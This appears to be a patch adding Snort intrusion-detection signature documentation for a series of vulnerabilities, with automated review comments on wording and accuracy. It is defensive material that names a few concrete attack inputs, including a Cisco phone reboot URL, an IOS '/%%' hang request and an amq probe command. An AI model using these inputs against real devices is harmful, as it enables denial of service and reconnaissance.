+
+--
+Impact:
+Denial of Service.
+
+--
+Detailed Information:
+Certain versions of Cisco's VoIP phones are vulnerable to an attack that
+can cause them to reboot when they recieve an http request such as 
+http://ciscophoneip/StreamingStatistics?<value> where <value> is an 
+integer value of arbitrary high value, typically a number greater than 
+32768.
+
+--
+Affected Systems:
+	Cisco VoIP Phones 7910, 7940, and 7960
+	  (software version 3.0 to 3.2)
+
+--
+Attack Scenarios:
+A remote user can send the exploit url to the phone, causing the phone 
+to reboot and disallowingthe user to place or recieve calls for up to 30
+seconds.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives: 
+None known.
+
+--
+False Negatives: 
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com> 
+Snort documentation contributed by Josh Sakofsky
+
+-- 
+Additional References:
+
+Bugtraq:
+http://www.securityfocus.com/bid/4794
+
+--
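Review bot: "recieve" appears twice (Detailed Information: "when they recieve an http request"; Attack Scenarios: "place or recieve calls") and should be "receive"; in Attack Scenarios "disallowingthe user to place" is missing a space and would read better as "preventing the user from placing". The trailing space after the Nigel Houghton contributor line and the "-- " delimiter before Additional References should also be stripped.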
--- /dev/null
+++ b/doc/signatures/100000143.txt
@@ -0,0 +1,62 @@
+Rule:
+
+--
+Sid:
+100000143
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a
+directory traversal associated with Imail Web Calendaring
+servicel
+
+--
+Impact:
+A successful attack can permit a user to navigate outside
+of the web root directory and read files.
+
+--
+Detailed Information:
+The Imail Web Calendaring Server does not properly sanitize
+a malformed URL that contains directory traversal characters.
+This vulnerability is associated with static objects identified
+by names ending in .jsp, .jpg, .gif, .wav, .css, or .htm.  This
+can permit an unauthorized user to examine files that may contain
+sensitive information.
+
+--
+Affected Systems:
+Ipswitch IMail Server 8.2 and prior
+Ipswitch IMail Server 8.15 and prior
+
+--
+Attack Scenarios:
+An attacker send a URI containing a directory traversal to view
+sensitive files on a vulnerable server.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Upgrade to the most current non-affected version of the product.
+
+--
+Contributors:
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References
+Other:
+
+--
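Review bot: Affected Systems lists both "Ipswitch IMail Server 8.2 and prior" and "Ipswitch IMail Server 8.15 and prior" for what reads as the same product, so one line is redundant or one refers to a different product line; clarify which. Typos: the Summary ends in "Web Calendaring servicel" (should be "service."), Attack Scenarios has "An attacker send a URI" (should be "sends"), and "Imail" and "IMail" are capitalised inconsistently. The closing "Additional References" line is missing its colon, and the "Other:" line under it has no entry after it; either add the reference or drop the empty label.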
--- /dev/null
+++ b/doc/signatures/3453.txt
@@ -0,0 +1,64 @@
+Rule:
+
+--
+Sid:
+3453
+
+--
+Summary:
+This event is generated when an attempt is made to probe for
+information on a host running Arkeia Client Backup server.
+
+--
+Impact:
+This may be reconnaissance to find version or operating
+system information about the Arkeia Client Backup server
+to later run an appropriate exploit.
+
+--
+Detailed Information:
+By default, Arkeia Client Backup servers do not require any
+authentication for informational requests.  An attacker who
+may be planning to exploit a vulnerable version of the software
+may attempt to request file or system information.
+
+--
+Affected Systems:
+	Arkeia version 5.3 and prior.
+
+--
+Attack Scenarios:
+An attacker can attempt to query an Arkeia Client Backup
+server for system or file information.
+
+--
+Ease of Attack:
+Simple.  Exploits are publicly available.
+
+--
+False Positives:
+None known. If you run Arkeia Client Backup on your network,
+make sure that your the variable $EXTERNAL_NET is configured
+to reflect IP addresses outside of your network.  Otherwise,
+this rule will alert on valid internal traffic.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Upgrade to the most current non-affected version of the product.
+
+--
+Contributors:
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References
+
+Metasploit:
+http://metasploit.com/research/arkeia_agent
+
+--
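Review bot: the False Positives section opens with "None known." and then immediately describes a false-positive condition (internal Arkeia traffic alerting when $EXTERNAL_NET is not set), which is contradictory; drop "None known." and keep the explanation. In the same paragraph "make sure that your the variable $EXTERNAL_NET" should read "make sure that the variable $EXTERNAL_NET". The "Additional References" header is missing its colon.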
--- /dev/null
+++ b/doc/signatures/1546.txt
@@ -0,0 +1,65 @@
+Rule:
+--
+Sid:
+1546
+--
+Summary:
+This event is generated when an attempt is made to issue a denial of 
+service attack against a Cisco router or switch.
+--
+Impact:
+If successful, the router will hang for two minutes, then reboot.   
+Under certain circumstances, the router will hang until power cycled 
+manually.
+--
+Detailed Information:
+The HTTP server that is part of some versions of the Cisco IOS software 
+has a bug that causes it to enter an infinite loop when handling a 
+request for "/%%".
+--
+Affected Systems:
+The following Cisco products can be affected.   Whether they actually 
+are vulnerable or not depends on the version of IOS that they are 
+running.   To properly determine if your product is vulnerable, see the 
+Cisco website referenced below.
+Cisco routers in the AGS/MGS/CGS/AGS+, IGS, RSM, 800, ubr900, 1000, 
+2500, 2600, 3000, 3600, 3800, 4000, 4500, 4700, AS5200, AS5300, AS5800, 
+6400, 7000, 7200, ubr7200, 7500, and 12000 series.
+Most recent versions of the LS1010 ATM switch.
+The Catalyst 6000 if it is running IOS.
+Some versions of the Catalyst 2900XL and 3500XL LAN switches.
+The Cisco DistributedDirector.
+--
+Attack Scenarios:
+This attack creates a denial of service.
+--
+Ease of Attack:
+Very easy.   
+--
+False Positives:
+Unlikely.
+--
+False Negatives:
+This signature only looks for attacks against systems that are included 
+in the $HTTP_SERVERS group.   Many administrators do not consider 
+routers or switches to be web servers, and therefore may not include 
+vulnerable devices in this group, causing an attack to proceed 
+unnoticed.   If you think one of your routers or switches is vulnerable, 
+reference it in the $HTTP_SERVERS group.
+--
+Corrective Action:
+Turn off the web server functionality, use access lists to ensure only 
+trusted hosts have access to the device, or upgrade your version of IOS.
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Snort documentation contributed by Kevin Peuhkurinen
+
+-- 
+Additional References:
+
+Cisco
+http://www.cisco.com/warp/public/707/ioshttpserver-pub.shtml
+
+--
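Review bot: this file omits the blank line before each `--` delimiter that the other documents use and has runs of three spaces after sentences ("reboot.   Under", "Very easy.   ", "group.   Many"), so normalise the whitespace to match the template. The False Negatives guidance about adding routers and switches to $HTTP_SERVERS is the most useful operational point in the file and is worth keeping exactly as written.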
--- /dev/null
+++ b/doc/signatures/1322.txt
@@ -0,0 +1,65 @@
+Rule:
+
+--
+Sid: 1322
+
+--
+Summary:
+This event is generated when packets on the network have both the 
+fragment and don't fragment bits set.
+
+--
+Impact:
+Possible reconnaisance.
+
+--
+Detailed Information:
+This rule detects a case where the packet is designated as having more 
+fragments whilst at the same time the "don't fragment" bit is also set.
+
+Under normal circumstances an ICMP error message (type 3 code 5) should 
+be generated and sent back to the source of the packet.
+
+The attacker may be trying to ascertain information about the network 
+architecture and configuration of network devices as a prelude to an 
+attack.
+
+an indicator of unauthorized network use, reconnaisance activity or 
+system compromise. These rules may also generate an event due to 
+improperly configured network devices.
+
+--
+Affected Systems:
+	All
+
+--
+Attack Scenarios:
+The attacker would need to craft packets with the fragment and don't 
+fragment bits set.
+
+--
+Ease of Attack:
+Simple
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Employ a packet filtering firewall to deny outbound ICMP error messages.
+
+--
+Contributors:
+Original rule writer unknown
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
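Review bot: the paragraph beginning "an indicator of unauthorized network use, reconnaisance activity or system compromise." is a sentence fragment missing its subject (it reads like a copied "These rules may generate an event that is ..." with the head dropped) and starts lowercase; restore the full sentence. "reconnaisance" appears in both Impact and that paragraph and should be "reconnaissance". Note also that Corrective Action ("deny outbound ICMP error messages") suppresses the type 3 code 5 reply that Detailed Information describes, but does not stop the crafted inbound packets the rule matches; say so, or add inbound filtering of packets with both bits set. Minor: "None Known" and "Simple" lack the trailing period used elsewhere.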
--- /dev/null
+++ b/doc/signatures/1956.txt
@@ -0,0 +1,57 @@
+Rule:
+
+--
+Sid:
+1956
+
+--
+Summary:
+This event is generated when a request is made to discover the version and configuration information associated with the Remote Procedure Call (RPC) amd.
+
+--
+Impact:
+Information disclosure.  This request can allow an attacker to discover the version of amd running as well as other configuration information about the host.
+
+--
+Detailed Information:
+The amd RPC service implements the automounter daemon on UNIX hosts.  The amd service automatically mounts and unmounts requested file systems.  An attacker can make a request to amd to discover its version number. A successful request will return the version number along with other valuable configuration information about the server, including the architecture.  
+
+--
+Affected Systems:
+Any system running amd.
+
+--
+Attack Scenarios:
+An attacker may request the version number associated with amd.  The response may give an attacker valuable configuration information about the host.
+
+--
+Ease of Attack:
+Simple.  Execute the command 'amq -v -U -h hostname/IP'
+
+-
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Limit remote access to RPC services.
+
+Filter RPC ports at the firewall to ensure access is denied to RPC-enabled machines. 
+
+Disable unneeded RPC services.
+
+--
+Contributors:
+Original rule written by Brian Caswell <bmc@sourcefire.com>
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+
+--
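Review bot: the delimiter before "False Positives:" is a single "-" rather than "--", which will break any tooling that splits these files on the "--" separator; change it to "--". There is also an extra blank line under Additional References, which is otherwise empty for a rule that names a specific RPC service (amd) and a specific probe command.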
--- /dev/null
+++ b/doc/signatures/2839.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2839
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure suspend_master_activity
+. This procedure is included in
+sys.dbms_repcat_mas.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
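Review bot: the lines "vulnerability in the procedure suspend_master_activity" / ". This procedure is included in" / "sys.dbms_repcat_mas." have a line break before the period, leaving a line that starts with ". This"; join them into one sentence. "Oracle Oracle9i" under Affected Systems repeats the vendor name. Corrective Action says "Apply the appropriate vendor supplied patch" but Additional References is empty, so the reader has no way to identify the patch; add the Oracle alert. Several header lines ("Rule: ", "Sid: ", "Summary: ", "Impact: ") carry trailing spaces.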
--- /dev/null
+++ b/doc/signatures/657.txt
@@ -0,0 +1,55 @@
+Rule:
+
+--
+Sid:
+657
+
+--
+Summary:
+This event is generated when an external user sends a HELP command with specific syntax to an internal SMTP server, which may indicate an attempt to exploit a buffer overflow vulnerability in NetManage Chameleon SMTP server. 
+
+--
+Impact:
+Severe. Remote execution of arbitrary code, leading to remote root compromise. 
+
+--
+Detailed Information:
+NetManage Chameleon SMTP server contains a buffer overflow vulnerability in the HELP command. If the HELP command is used with an argument longer than 514 characters, a buffer overflow condition occurs, allowing the execution of arbitrary code.
+
+--
+Affected Systems:
+Systems running NetManage Chameleon Unix 97 or NetManage Chameleon 4.5.
+
+--
+Attack Scenarios:
+An attacker sends an overly long string to a vulnerable NetManage Chameleon SMTP server in the HELP command. This causes a buffer overflow condition, allowing the attacker to execute arbitrary code on the server and obtain root privileges on the mail server.
+
+--
+Ease of Attack:
+Simple.
+
+--
+alse Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Upgrade to the latest version of NetManage Chameleon SMTP server.
+
+--
+Contributors:
+Original rule writer unknown
+Modified by Brian Caswell <bmc@sourcefire.com>
+Sourcefire Research Team
+Sourcefire Technical Publications Team
+Jen Harvey <jennifer.harvey@sourcefire.com>
+
+--
+Additional References:
+
+
+--
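Review bot: the section header on the line "+alse Positives:" is missing its leading "F", so anything that splits these files on the "--" plus header pattern will not find the False Positives section; it should read "False Positives:". Additional References is empty for a vulnerability that names specific products and versions and a specific 514-character HELP argument; add the advisory those figures come from. There is also a stray extra blank line under Additional References that the other files do not have.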
--- /dev/null
+++ b/doc/signatures/100000400.txt
@@ -0,0 +1,58 @@
+
+
+Rule:
+
+--
+Sid:
+100000400
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file include vulnerability in the "Ovidentia" application running on a webserver. Access to the file "fileman.php" using a remote file being passed as the "babInstallPath" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a remote machine via the "babInstallPath" parameter in the "fileman.php" script used by the "Ovidentia" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Ovidentia
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
+
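Review bot: the third paragraph of Detailed Information ("+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server...") is credential-validation boilerplate that does not describe a remote file include, and the Attack Scenarios paragraph likewise talks about supplying credentials; both should describe the actual scenario, a URL to an attacker-controlled file passed in "babInstallPath" being included and executed by "fileman.php". Also "ona" should be "on a", "an exploitation attempt has been attempted" is redundant (say "exploitation has been attempted"), and the file opens with two blank lines before "Rule:" and closes with a trailing blank line, unlike the other files in the set.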
--- /dev/null
+++ b/doc/signatures/1207.txt
@@ -0,0 +1,71 @@
+Rule:
+
+--
+Sid:
+1207
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability on a web server or a web application resident on a web
+server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server. Possible execution of arbitrary code of 
+the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running a Web server or a vulnerable application on a web server.
+
+Many known vulnerabilities exist for each implementation and the 
+attack scenarios are legion.
+
+Some applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and 
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+	All systems using a web server.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
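Review bot: the Summary and Detailed Information never say which request, URI or content this rule matches; "exploit a known vulnerability on a web server" applies to every web rule in the set and gives an analyst nothing to triage with. The same text is reused verbatim for sids 1057 and 1164 later in this patch. Each of these files should at least name the script or pattern its rule looks for, and Affected Systems should name the product instead of "All systems using a web server."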
--- /dev/null
+++ b/doc/signatures/1057.txt
@@ -0,0 +1,71 @@
+Rule:
+
+--
+Sid:
+1057
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability on a web server or a web application resident on a web
+server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server. Possible execution of arbitrary code of 
+the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running a Web server or a vulnerable application on a web server.
+
+Many known vulnerabilities exist for each implementation and the 
+attack scenarios are legion.
+
+Some applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and 
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+	All systems using a web server.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
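Review bot: apart from the Sid line this file is a byte-for-byte copy of 1207.txt, so two different rules are documented with the same generic text. Replace the Summary and Affected Systems with the specific URI or pattern that sid 1057 matches and the product it targets, or the documentation will not help distinguish a 1057 alert from a 1207 alert.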
--- /dev/null
+++ b/doc/signatures/849.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+849
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
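Review bot: "ona web server" in Detailed Information should be "on a web server". As with the generic web-server files, the Summary does not identify the CGI application or request this rule matches ("a CGI web application running on a server"), so the alert cannot be triaged from the documentation; add the script name or pattern the rule looks for.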
--- /dev/null
+++ b/doc/signatures/2078.txt
@@ -0,0 +1,62 @@
+Rule:
+
+--
+Sid:
+2078
+
+--
+Summary:
+HTTP.
+
+--
+Impact:
+Data loss and disclosure of information.
+
+--
+Detailed Information:
+A vulnerability exists such that a carefully crafted SQL query can be 
+used by a malicious user that will delete all private messages for users
+on the system.
+
+The scripts do not perform detailed checking of SQL queries in some 
+instances. This leaves the system vulnerable to SQL injection 
+techniques.
+
+--
+Affected Systems:
+	phpBB Group phpBB 2.0.3
+
+--
+Attack Scenarios:
+The attacker can craft his own SQL query to be executed or use a known 
+exploit for this vulnerability.
+
+--
+Ease of Attack:
+Simple
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Upgrade to the latest non vulnerable version of phpBB.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Bugtraq:
+http://www.securityfocus.com/bid/6634
+
+--
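Review bot: the Summary is the single word "HTTP.", a placeholder rather than a description of the event; replace it with a sentence derived from the Detailed Information, i.e. that the event fires on an attempt to exploit an SQL injection vulnerability in phpBB 2.0.3 that can delete all users' private messages. Detailed Information also says "The scripts do not perform detailed checking of SQL queries" without naming the script or parameter; if the rule matches a specific script and parameter, say which, since that is what the analyst will see in the packet.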
--- /dev/null
+++ b/doc/signatures/111-6.txt
@@ -0,0 +1,58 @@
+Rule: 
+
+--
+Sid: 
+111-6
+
+-- 
+Summary: 
+This event is generated when the pre-processor stream4
+detects network traffic that may constitute an attack.
+
+-- 
+Impact: 
+This may indicate scanning activity.
+
+--
+Detailed Information:
+The pre-processor stream4 has detected network traffic that may indicate
+an Xmas Tree scan is in progress. That is, packets with the FIN, URG and
+PUSH flags set have been detected.
+
+--
+Affected Systems:
+	All systems
+
+--
+Attack Scenarios: 
+An attacker may utilize scanning techniques to determine possible points
+of exploitation against a host.
+
+-- 
+Ease of Attack: 
+Simple. Many scanning tools exist.
+
+-- 
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+-- 
+Corrective Action:
+Check the target host for signs of compromise.
+
+Ensure the system is up to date with any appropriate vendor supplied patches.
+
+--
+Contributors:
+Martin Roesch <roesch@sourcefire.com>
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
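Review bot: the Sid is written as "111-6", but Snort reports preprocessor events in generator:id form ("111:6"), so the key a reader takes from the alert will not match the documented one; use the colon form or state the mapping. Corrective Action ("Ensure the system is up to date with any appropriate vendor supplied patches") is an odd response to a port scan; the event is reconnaissance, so reviewing what the scanner could reach (exposed services, firewall policy) fits better than patching. False Positives "None Known." is also doubtful for a pure flag-combination check: packet generators such as hping, mentioned in 2182.txt in this same patch, produce the FIN/URG/PSH combination without any scan in progress.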
--- /dev/null
+++ b/doc/signatures/100000423.txt
@@ -0,0 +1,58 @@
+
+
+Rule:
+
+--
+Sid:
+100000423
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file include vulnerability in the "DotWidget CMS" application running on a webserver. Access to the file "index.php" using a remote file being passed as the "file_path" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a remote machine via the "file_path" parameter in the "index.php" script used by the "DotWidget CMS" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using DotWidget CMS
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
+
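Review bot: same problems as 100000400.txt: the credential-validation paragraph in Detailed Information and the Attack Scenarios text describe an authentication bypass, not a remote file include through the "file_path" parameter of "index.php"; "ona" should be "on a"; "an exploitation attempt has been attempted" is redundant; and the file opens with two blank lines and ends with a trailing one. Separately, "index.php" with a "file_path" parameter is a very generic pattern, so if the rule only checks the script and parameter names, other applications using the same names will match and False Positives should say so rather than "None known."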
--- /dev/null
+++ b/doc/signatures/379.txt
@@ -0,0 +1,56 @@
+Rule:
+
+--
+Sid:
+379
+
+--
+Summary:
+This event is generated when an ICMP echo request is made from a Windows host running "pinger" software.
+
+--
+Impact:
+Information gathering.  An ICMP echo request can determine if a host is active.
+
+--
+Detailed Information:
+An ICMP echo request is used by the ping command to elicit an ICMP echo reply from a listening live host.  An echo request that originates from a Windows host running "pinger" software contains a unique payload in the message request.
+
+--
+Affected Systems:
+All
+
+--
+Attack Scenarios:
+An attacker may attempt to determine live hosts in a network prior to launching an attack.
+
+--
+Ease of Attack:
+Simple
+
+--
+False Positives:
+An ICMP echo request may be used to legimately troubleshoot networking problems.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Block inbound ICMP echo requests.
+
+--
+Contributors:
+Original rule written by Max Vision <vision@whitehats.org>
+Documented by Steven Alexander<alexander.s@mccd.edu>
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+Arachnids:
+http://www.whitehats.com/info/IDS165
+
+--
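Review bot: "legimately" in False Positives should be "legitimately", and "Steven Alexander<alexander.s@mccd.edu>" under Contributors is missing the space before the address. Corrective Action "Block inbound ICMP echo requests." is broader than the event warrants: the rule fingerprints the "pinger" payload in an otherwise ordinary echo request, so the practical action is to record the scanning source and apply the site's ICMP policy at the border, not to block all inbound pings, which the False Positives section itself notes are used for troubleshooting.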
--- /dev/null
+++ b/doc/signatures/3091.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+3091
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in Microsoft License Logging Service.
+
+-- 
+Impact: 
+Serious. Execution of arbitrary code leading to unauthorized
+administrative access to the target host. Denial of Service (DoS) is
+also possible.
+
+--
+Detailed Information:
+Microsoft License Logging Service is used to manage licenses for
+Microsoft server products.
+
+A vulnerability in the service exists due to a programming error such
+that an unchecked buffer may present an attacker with the opportunity to
+exploit the service and run code of their choosing on an affected
+system. The attacker may then cause a DoS condition in the service or
+possibly gain administrative access to the target host.
+
+The unchecked buffer exists when processing the length of messages sent
+to the logging service.
+
+--
+Affected Systems:
+	Microsoft Windows Server 2003
+	Microsoft Windows Server 2000
+	Microsoft Windows NT Server
+
+--
+Attack Scenarios: 
+An attacker can supply extra data in the message to the service
+containing code of their choosing to be run on the server.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+-- 
+
+Corrective Action: 
+Apply the appropriate vendor supplied patches.
+
+--
+Contributors: 
+Sourcefire Vulnerability Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
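Review bot: the Affected Systems list uses "Microsoft Windows Server 2000", which is not a product name; the product is "Microsoft Windows 2000 Server". There is a stray blank line between "--" and "Corrective Action:" that the other sections do not have. Additional References is empty even though Corrective Action says to apply the vendor patches; add the Microsoft bulletin so the reader can find them. Attack Scenarios says the attacker supplies "extra data in the message ... containing code of their choosing", while Detailed Information locates the unchecked buffer in the handling of the message length; make the scenario say that an oversized length or message overflows the buffer and the attacker's payload carries the code.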
--- /dev/null
+++ b/doc/signatures/2182.txt
@@ -0,0 +1,71 @@
+Rule:
+
+--
+Sid:
+2182
+
+--
+Summary:
+This event is generated when activity generated by the Linux Trojan Typot is detected.
+
+--
+Impact:
+Increased network traffic leading to bandwidth consumption.
+
+--
+Detailed Information:
+Current information based on binary analysis of the Typot Trojan shows that network traffic is generated with a TCP window size of 55808 bytes. Whilst this Trojan does not appear to contain any malicious payload it will generate spurious network scanning activity. The source IP address for the scanning activity is spoofed.
+
+When a host becomes infected a file named "r" is created in the same directory the binary was executed from. The Trojan then begins generating network traffic as described above. An infected victim host may have a file named "a" in the /tmp directory. After an unspecified time period the Trojan itself may attempt to connect to an external IP address using Secure Shell (ssh) for communication. If this communication is succesful, the "a" file may be deleted.
+
+The Trojan may also use the libpcap and libnet libraries to generate network traffic.
+
+--
+Affected Systems:
+Linux
+
+--
+Attack Scenarios:
+An attacker may have installed the Trojan after a previous system compromise.
+
+--
+Ease of Attack:
+Simple.  
+
+--
+False Positives:
+Any application that generates a TCP SYN packet with a window size of 55808 bytes will generate this event. Currently it is not known which, if any, commonly deployed applications generate these specific packets.
+
+It is also possible to recreate this particular traffic using network packet generating tools such as hping.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Investigate the affected host for signs of system compromise.
+
+Delete the files "r" and "a" if found.
+
+--
+Contributors:
+Sourcefire Research Team
+Sourcefire Research Team
